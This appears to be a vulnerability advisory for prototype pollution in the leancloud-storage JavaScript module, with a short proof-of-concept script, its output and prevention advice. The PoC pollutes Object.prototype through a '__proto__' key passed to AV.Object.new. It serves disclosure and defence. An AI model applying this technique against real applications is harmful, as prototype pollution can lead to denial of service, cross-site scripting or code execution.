leancloud
Prototype pollution vulnerability affecting leancloud-storage module, versions >=3.4.2 <=4.15.2
Overview
The vulnerability located at AV.Object (dist/node/object.js:107). where set() method
used to unsafely assign source property to the destination. An attacker can be exploit this method to copy malicious property to the built-in Object.prototype through the special properties __proto__ or constructor.prototype.
Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service,
remote code execution or cross-site scripting attacks.
PoC:
(async () => {
const lib = await import('leancloud-storage');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
lib.default.Object.new ({ "__proto__.polluted": true})
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();
Output:
Before Attack: {}
After Attack: {"polluted":true}
Output of a successful fix:
Before Attack: {}
After Attack: {}
How to prevent:
Assign or copy a property should only be applied an own property of the destination object, thus, check for that (e.g using hasOwnProperty) is sufficient. Alternatively, block the property names __proto__ or constructor assigned. Other recommendations at Snyk.io:
https://learn.snyk.io/lesson/prototype-pollution/#a0a863a5-fd3a-539f-e1ed-a0769f6c6e3b
